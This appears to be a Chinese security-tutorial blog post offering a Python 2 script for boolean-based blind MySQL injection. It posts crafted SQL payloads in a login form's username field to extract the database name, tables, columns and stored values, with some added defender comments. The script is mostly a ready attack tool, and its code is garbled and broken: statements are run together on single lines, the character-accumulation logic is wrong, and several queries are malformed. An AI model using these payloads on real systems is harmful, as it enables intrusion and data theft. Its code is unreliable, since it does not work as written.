從零開始學安全(三十五)●mysql 盲注手工自定義python腳本

import requests import string #mysql 手動注入 通用腳本 適用盲注 能夠跟具本身的需求更改
# Boolean-based blind MySQL injection walkthrough from the post, left
# byte-identical: the paste collapsed each step onto a single line, so the
# statement boundaries below are inferred from the text, and the code is
# written against the Python 2 stdlib (`string.letters`, `str.encode('hex')`).
# Every step sends a POST to `url` with the crafted predicate in the
# `username` form field and decides true/false by whether the `success` /
# `error` marker substring occurs in the response body.
# Defender's view: each loop iteration is one request, so a run appears in
# access logs as a burst of POSTs whose `username` value carries SQL with a
# steadily increasing comparison constant. Parameterized queries remove the
# injection point; identical responses for the true and false branches
# remove the oracle this script depends on.
# NOTE(review): `list` shadows the builtin; both markers are pasted as empty
# strings, so `error in r` and `success in r` are trivially true as written.
def home(): url="url" list=string.digits+string.letters+"!@#$%^&*()_+{}-=<>,./?" s=requests.session() success = ""  # substring that marks a "true" response
    error="" # substring that marks a "false" response

# 1. Length of the current database name: raise the threshold until the "false" marker appears
    leng=0 i=0 while True: sql="admin%1$\\' or length(database())>"+str(i)+"#" data={"username":sql,"passwrod":1} r=s.post(url,data=data).content if  error in r : leng=i i=0 break i+=1
    print ("length the database:%d" %leng) #2. Name of the current database, one character position per outer iteration
    strs=''
    # one POST per candidate character in `list` for each position `t`
    for t in range(leng): for l in list: sql="admin%1$\\' or ascii(substr(database(),"+str(t)+",1))="+str(ord(l))+"#" data = {"username": sql, "passwrod": 1} r=s.post(url,data=data).content if success in r: strs+=strs break
    print("database is :%s" % (strs)) #3. All tables of the current database, via information_schema.tables
    # length of the group_concat'ed table-name list
    while True: sql="admin%1$\\' or select length(group_concat(table_name)) from information_schema.tables where table_type='base table' and table_schema=database()<"+i+"#" data = {"username": sql, "passwrod": 1} r = s.post(url, data=data).content if error in r: leng=i i=0 break i+=1
    print("length table is :%s" % (leng)) # read the concatenated table names character by character
    for t in range(leng): for l in list: sql = "admin%1$\\' or ascii(substr(select group_concat(table_name) from information_schema.tables where table_type='base table' and table_schema=database(),"+str(t)+",1))="+str(ord(l))+"#" data = {"username": sql, "passwrod": 1} r=s.post(url,data=data).content if success in r: strs+=strs break
    print("talbes is :%s" % (strs)) #4. Pick the table to inspect and list its columns via information_schema.columns
    # length of the group_concat'ed column-name list
    table='table'# name of the table to look up
    # `tablename` (hex form) is computed but the visible code only reads `table_name`
    tablename = '0x' + table.encode('hex') table_name = table while True: sql = "admin%1$\\' or select length(group_concat(column_name)) from information_schema.columns where table_name='"+table_name+"' and table_schema=database()<" + i + "#" data = {"username": sql, "passwrod": 1} r = s.post(url, data=data).content if error in r: leng = i i = 0 break i += 1
    print("length table is :%s" % (leng)) # read the concatenated column names character by character
    for t in range(leng): for l in list: sql = "admin%1$\\' or ascii(substr(select group_concat(column_name) from information_schema.columns where table_name='"+table_name+"' and table_schema=database()," + str( t) + ",1))=" + str(ord(l)) + "#" data = {"username": sql, "passwrod": 1} r = s.post(url, data=data).content if success in r: strs += strs break
    print("talbes is :%s" % (strs)) # 5. Values of the chosen column
    # row count of the chosen table; note this step posts the key 'password' where the others use 'passwrod'
    num=0 while True: sql = "admin%1$\\' or " + "(select count(*) from " + table_name + ")>" + str(i) + "#" data = {'username':sql,'password':1} r = s.post(url,data=data).content if error in r: num = i i=0 break i+=1
        pass
    print("[+]number(column): %d" %(num)) # length reuses `leng` from the column step above
    table = 'table'  # name of the table to look up
    col='user'# column to return
    for t in range(leng): for l in list: sql = "admin%1$\\' or ascii(substr(select "+col+" from limit 0,1 "+table_name+","+str(t)+",1))=" + str(ord(l)) + "#" data = {"username": sql, "passwrod": 1} r = s.post(url, data=data).content if success in r: strs += strs break
    print("talbes is :%s" % (strs))